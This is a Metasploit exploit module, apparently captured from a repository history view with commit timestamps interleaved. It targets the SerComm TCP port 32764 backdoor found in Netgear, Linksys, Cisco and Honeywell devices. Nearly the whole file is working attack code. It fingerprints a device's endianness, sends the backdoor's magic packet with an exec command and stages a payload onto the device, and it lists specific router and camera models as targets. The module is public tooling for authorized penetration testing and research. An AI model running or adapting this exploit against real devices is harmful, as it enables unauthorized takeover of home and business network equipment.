metasploit-framework/modules/exploits/linux/misc/sercomm_exec.rb

213 lines
5.7 KiB
Ruby
Raw Normal View History

2014-01-09 13:51:42 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-01-09 13:51:42 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Remote
2014-01-09 13:51:42 +00:00
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "SerComm Device Remote Code Execution",
'Description' => %q{
2014-01-09 13:51:42 +00:00
This module will cause remote code execution on several SerComm devices.
These devices typically include routers from NetGear and Linksys.
2014-01-16 17:16:11 +00:00
This module was tested successfully against several NetGear, Honeywell
and Cisco devices.
},
'License' => MSF_LICENSE,
'Author' =>
[
2014-01-09 13:51:42 +00:00
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
],
'Payload' =>
{
2014-01-09 13:51:42 +00:00
'Space' => 10000, # Could be more, but this should be good enough
'DisableNops' => true
},
2014-01-09 13:51:42 +00:00
'Platform' => 'linux',
'Privileged' => false,
'Targets' =>
[
['Generic Linux MIPS Big Endian',
2014-01-09 13:51:42 +00:00
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'VVV'
2014-01-09 13:51:42 +00:00
}
],
['Generic Linux MIPS Little Endian',
2014-01-09 13:51:42 +00:00
{
'Arch' => ARCH_MIPSLE,
'PackFormat' => 'NNN'
}
],
2014-01-16 18:44:14 +00:00
['Manual Linux MIPS Big Endian',
{
'Arch' => ARCH_MIPSBE
}
],
['Manual Linux MIPS Little Endian',
{
'Arch' => ARCH_MIPSLE
}
],
['Cisco WAP4410N',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'NNN',
}
],
['Honeywell WAP-PL2 IP Camera',
{
'Arch' => ARCH_MIPSLE,
'PackFormat' => 'VVV'
}
],
['Netgear DG834',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'VVV',
2014-01-16 18:44:14 +00:00
'NoArgs' => true
}
],
['Netgear DG834G',
{
'Arch' => ARCH_MIPSLE,
'PackFormat' => 'VVV',
'PayloadEncode' => 'octal'
}
],
['Netgear DG834PN',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'VVV',
'NoArgs' => true
}
],
['Netgear DGN1000',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'VVV',
'NoArgs' => true
}
],
['Netgear DSG835',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'VVV',
'NoArgs' => true,
}
],
['Netgear WPNT834',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'NNN',
'UploadPath' => '/var',
'PayloadEncode' => 'octal'
2014-01-09 13:51:42 +00:00
}
2014-01-16 18:44:14 +00:00
]
],
2014-01-09 13:51:42 +00:00
'DefaultTarget' => 0,
'References' =>
[
[ 'OSVDB', '101653' ],
2014-01-09 13:51:42 +00:00
[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
],
'DisclosureDate' => "Dec 31 2013" ))
register_options(
[
2014-01-09 14:01:11 +00:00
Opt::RPORT(32764)
])
2014-01-16 18:44:14 +00:00
register_advanced_options(
[
OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),
])
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
2014-01-09 21:17:13 +00:00
fprint = endian_fingerprint
case fprint
when 'BE'
2014-01-21 23:14:55 +00:00
vprint_status("Detected Big Endian")
2014-01-24 18:08:23 +00:00
return Msf::Exploit::CheckCode::Appears
when 'LE'
2014-01-21 23:14:55 +00:00
vprint_status("Detected Little Endian")
2014-01-24 18:08:23 +00:00
return Msf::Exploit::CheckCode::Appears
end
2014-01-21 23:14:55 +00:00
return Msf::Exploit::CheckCode::Safe
end
def exploit
2014-01-16 18:44:14 +00:00
if target.name =~ /Manual/
print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACK advanced options")
@no_args = datastore['NOARGS']
@upload_path = datastore['UPLOADPATH']
@encoding_format = datastore['ENCODING']
@pack_format = datastore['PACKFORMAT']
else
@no_args = target['NoArgs']
@upload_path = target['UploadPath']
@encoding_format = target['PayloadEncode']
@pack_format = target['PackFormat']
end
execute_cmdstager(
2014-01-16 18:44:14 +00:00
:noargs => @no_args,
:temp => @upload_path,
:enc_format => @encoding_format,
:flavor => :echo
)
end
2014-01-09 21:17:13 +00:00
def endian_fingerprint
begin
connect
2014-01-09 13:51:42 +00:00
sock.put(rand_text(5))
res = sock.get_once
disconnect
2014-01-09 21:17:13 +00:00
if res && res.start_with?("MMcS")
return 'BE'
2014-01-09 21:17:13 +00:00
elsif res && res.start_with?("ScMM")
return 'LE'
end
rescue Rex::ConnectionError => e
print_error("Connection failed: #{e.class}: #{e}")
end
2014-01-09 13:51:42 +00:00
return nil
end
def execute_command(cmd, opts)
# Get the length of the command, for the backdoor's command injection
2014-01-09 13:51:42 +00:00
cmd_length = cmd.length
2014-01-09 13:51:42 +00:00
# 0x53634d4d => Backdoor code
# 0x07 => Exec command
# cmd_length => Length of command to execute, sent after communication struct
2014-01-16 18:44:14 +00:00
data = [0x53634d4d, 0x07, cmd_length].pack(@pack_format)
connect
# Send command structure followed by command text
sock.put(data+cmd)
disconnect
Rex.sleep(1)
end
end